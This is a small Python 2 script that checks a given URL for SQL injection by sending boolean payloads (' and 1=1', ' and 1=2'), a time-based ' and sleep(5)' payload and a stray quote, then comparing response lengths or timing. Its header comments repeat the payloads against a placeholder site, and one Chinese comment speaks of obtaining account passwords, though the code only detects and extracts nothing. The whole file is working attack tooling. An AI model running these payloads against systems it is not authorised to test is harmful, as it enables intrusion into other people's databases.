#coding:utf-8
#http://www.xxx.com?id=1 and 1=1
#http://www.xxx.com?id=1 and 1=2
#http://www.xxx.com?id=1 and sleep(x)
#http://www.xxx.com?id=1 '
import requests
from time import time
from sys import argv

def Usage():
	print "[Usage] ./xxx.py [URL] "
	#通过输入 url 参数 错误信息 获取 成功的账号密码


def Verfic1(url):
	payload = [' and 1=1', ' and 1=2']
	v1 = requests.get(url).headers.get('Content-Length')
	v2 = requests.get(url+payload[0]).headers.get('Content-Length')
	v3 = requests.get(url+payload[1]).headers.get('Content-Length')
	if v1 == v2 and v2 != v3:
		return True
	else:
		return False


def Verfic2(url):
	payload = ' and sleep(5)'
	t1 = time()
	requests.get(url+payload)
	t2 = time()
	if t2-t1 > 5:
		return True
	else:
		return False


def Verfic3(url):
	payload = "'"
	v1 = requests.get(url).headers.get("Content-Length")
	v2 = requests.get(url+payload).headers.get("Content-Length")
	if v1 != v2:
		return True
	else:
		return False


if __name__ == '__main__':
	try:
		url = argv[1]
		a = Verfic1(url)
		if a==True:
			print "[INFO]URL: %s is SQL Injection Vulnerbility!" % url
		else:
			a = Verfic2(url)
			if a==True:
				print "[INFO]URL: %s is SQL Injection Vulnerbility!" % url
			else:
				a =Verfic3(url)
				if a==True:
					print "[INFO]URL: %s is SQL Injection Vulnerbility!" % url
		if a==False:
			print "[INFO]URL: %s is Not SQL Injection Vulnerbility!" % url
	except:
		Usage()
